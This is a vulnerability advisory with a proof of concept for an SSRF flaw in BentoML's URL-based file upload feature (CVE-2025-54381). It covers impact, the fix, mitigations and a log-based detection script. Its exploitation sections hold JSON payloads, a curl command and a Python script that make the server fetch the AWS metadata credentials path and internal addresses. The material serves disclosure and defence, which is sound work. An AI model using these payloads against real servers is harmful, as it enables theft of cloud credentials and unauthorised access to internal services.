CVE-2025-54381 PoC — BentoML is Vulnerable to an SSRF Attack Through File Upload Processing

Associated Vulnerability
Title: BentoML is Vulnerable to an SSRF Attack Through File Upload Processing (CVE-2025-54381)
Description: BentoML is a Python library for building online serving systems optimized for AI apps and model inference. In versions 1.4.0 until 1.4.19, the file upload processing system contains an SSRF vulnerability that allows unauthenticated remote attackers to force the server to make arbitrary HTTP requests. The vulnerability stems from the multipart form data and JSON request handlers, which automatically download files from user-provided URLs without validating whether those URLs point to internal network addresses, cloud metadata endpoints, or other restricted resources. The documentation explicitly promotes this URL-based file upload feature, making it an intended design that exposes all deployed services to SSRF attacks by default. Version 1.4.19 contains a patch for the issue.
# **🔓 CVE-2025-54381 – ⚠️ Critical SSRF Vulnerability in BentoML Allows 🚨 Unauthorized Internal & Cloud Metadata Access**

---

## 📛 CVE Information

* **CVE ID:** CVE-2025-54381
* **Published Date:** July 30, 2025
* **Discovered by:** Wiz Research Team
* **Reported to GitHub Advisory Database & NVD**
* **Severity:** Critical
* **CVSS v3.1 Score:** **9.9 / 10**

---

## 📦 Affected Software

* **Product:** [BentoML](https://github.com/bentoml/BentoML) (Python-based framework for packaging, shipping, and deploying ML models)
* **Affected Versions:**

  * All versions from **1.4.0** up to, but not including, **1.4.19** (1.4.19 contains the patch)

---

## 🔍 Vulnerability Type

* **Type:** SSRF (Server-Side Request Forgery)
* **CWE Category:** CWE-918 – Server-Side Request Forgery

---

## ⚠️ Detailed Vulnerability Description

The vulnerability lies in the **URL-based file upload** feature in BentoML's model-serving APIs. Specifically, BentoML supports receiving file inputs via URLs in both:

1. **Multipart Form Requests**
2. **JSON POST Requests**

The framework then performs a **server-side HTTP GET request** to download the file **without properly validating the user-supplied URL**.

### What makes it dangerous?

The server can be tricked into:

* Accessing **internal-only services**, e.g. `http://localhost:...`, `http://127.0.0.1:...`
* Accessing **cloud metadata endpoints** like:

  * `http://169.254.169.254/latest/meta-data/` (AWS)
  * `http://metadata.google.internal/` (GCP)
* Accessing **internal IP ranges**:

  * `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`

These endpoints may expose:

* IAM credentials
* Tokens
* Service secrets
* Private APIs
* Admin dashboards

---

## 💣 Impact

| Impact Area             | Description                                |
| ----------------------- | ------------------------------------------ |
| **Confidentiality**     | High — attacker may steal internal secrets |
| **Integrity**           | Low — read-only attack                     |
| **Availability**        | Low — unlikely to crash the system         |
| **Scope**               | Changed — attack may reach other systems   |
| **Privileges Required** | None                                       |
| **User Interaction**    | None                                       |

---

## 🧪 Exploitation Examples

### Example 1: Accessing AWS Metadata

```json
{
  "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
}
```

If the server is hosted on AWS, this fetches sensitive IAM role credentials.

---

### Example 2: Internal Reconnaissance

```json
{
  "url": "http://10.0.0.15:8080/admin"
}
```

The attacker could scan for internal services exposed only on the private network.

---

### Example 3: Localhost SSRF

```json
{
  "url": "http://127.0.0.1:9000/metrics"
}
```

This may expose services like Prometheus, Grafana, MinIO, etc.

---

## 🔧 Fix & Mitigation

### ✅ Fixed in version 1.4.19

The patch introduces:

* URL scheme validation
* IP address checking
* Blocking requests to:

  * localhost
  * internal IP ranges
  * metadata endpoints
* Additional safeguards for both JSON and multipart upload handlers

---

### 🧱 Temporary Mitigations

If you cannot upgrade:

1. **Add firewall rules** to block outbound traffic to internal networks and metadata endpoints.
2. **Use a proxy** with allowlists for outgoing requests.
3. **Implement URL filtering logic** before allowing downloads.
4. **Disable URL-based file upload** feature if not needed.
5. **Log all outbound requests** and monitor suspicious connections.

---

## 🧰 Detection

* Monitor logs for requests from BentoML to:

  * `169.254.169.254`
  * `127.0.0.1`
  * `10.*.*.*`, `192.168.*.*`, etc.
* Use dynamic analysis tools (DAST) to fuzz file-upload endpoints with internal URLs.
* Check for unexpected `GET` requests made from your BentoML server to unauthorized endpoints.
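
The log check described above, sketched as an added example (not part of the original README): it scans egress flow records for connections from BentoML hosts to the watched destinations. The `key=value` log layout, the host addresses, and the `expected` allowlist are constructed assumptions; adapt the regex to your own log source.

```python
import ipaddress
import re

# Destination ranges named in the Detection section.
WATCHED = [
    ("cloud-metadata", ipaddress.ip_network("169.254.169.254/32")),
    ("loopback", ipaddress.ip_network("127.0.0.0/8")),
    ("private", ipaddress.ip_network("10.0.0.0/8")),
    ("private", ipaddress.ip_network("172.16.0.0/12")),
    ("private", ipaddress.ip_network("192.168.0.0/16")),
]

# Assumed flow-log layout: "... src=<ip> dst=<ip> dport=<port> ..."
LINE_RE = re.compile(r"src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+dport=(?P<dport>\d+)")


def classify(dst):
    """Return the watched-range label for dst, or None if it is not watched."""
    try:
        ip = ipaddress.ip_address(dst)
    except ValueError:
        return None
    for label, net in WATCHED:
        if ip.version == net.version and ip in net:
            return label
    return None


def find_suspicious_egress(lines, bentoml_hosts, expected=()):
    """List (line_no, src, dst, label) for flows from BentoML hosts to
    watched ranges, skipping known-good (dst, port) pairs in `expected`."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LINE_RE.search(line)
        if not m or m["src"] not in bentoml_hosts:
            continue
        label = classify(m["dst"])
        if label and (m["dst"], int(m["dport"])) not in expected:
            hits.append((n, m["src"], m["dst"], label))
    return hits


# Constructed sample records; 10.20.0.7 stands in for the BentoML server.
SAMPLE_LOG = [
    "2025-08-01T10:00:01Z src=10.20.0.7 dst=203.0.113.10 dport=443 action=ACCEPT",
    "2025-08-01T10:00:04Z src=10.20.0.7 dst=169.254.169.254 dport=80 action=ACCEPT",
    "2025-08-01T10:00:05Z src=10.20.0.7 dst=10.20.0.50 dport=5432 action=ACCEPT",
    "2025-08-01T10:00:09Z src=10.20.0.7 dst=10.0.0.15 dport=8080 action=ACCEPT",
    "2025-08-01T10:00:12Z src=10.20.0.7 dst=127.0.0.1 dport=9000 action=ACCEPT",
    "2025-08-01T10:00:15Z src=10.20.0.9 dst=192.168.1.1 dport=80 action=ACCEPT",
]
```

Listing the service's legitimate internal dependencies in `expected` (here, a database at `10.20.0.50:5432`) keeps the output limited to destinations the model server has no reason to contact.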

---

## 🧪 Proof of Concept (PoC)

### Basic JSON Request Exploiting SSRF

```bash
curl -X POST http://<target>:3000/upload \
  -H "Content-Type: application/json" \
  -d '{"url": "http://169.254.169.254/latest/meta-data/"}'
```

### Python PoC

```python
import requests

url = "http://target-server/upload"
data = {"url": "http://169.254.169.254/latest/meta-data/"}
r = requests.post(url, json=data)
print(r.text)
```

---

## ✅ Recommended Actions for Security Teams

1. **Identify all BentoML deployments**
2. **Upgrade to 1.4.19 or later**
3. **Disable URL-based uploads** unless absolutely needed
4. **Apply egress filtering on server firewalls**
5. **Audit logs** for abnormal outbound HTTP traffic
6. **Conduct a code review** for any custom handlers using `requests.get()` or similar with user input

---

## 📚 Summary Table

| Key               | Value                            |
| ----------------- | -------------------------------- |
| CVE ID            | CVE-2025-54381                   |
| Product           | BentoML                          |
| Versions Affected | 1.4.0 up to (not including) 1.4.19 |
| Vulnerability     | SSRF                             |
| CVSS v3.1 Score   | 9.9 (Critical)                   |
| Fixed Version     | 1.4.19                           |
| Exploitable by    | Remote attacker (no auth needed) |
| Discovered by     | Wiz Research                     |

---


## 🔒 Disclaimer

This content is provided **strictly for educational, ethical, and informational purposes only**. The goal is to raise awareness about CVE-2025-54381 and help developers and security professionals understand, detect, and remediate potential vulnerabilities in their systems.

**❌ Any unauthorized use of this information to exploit or harm systems without explicit permission is illegal and unethical.**
By proceeding, you agree to use this knowledge responsibly and in compliance with all applicable laws and ethical guidelines.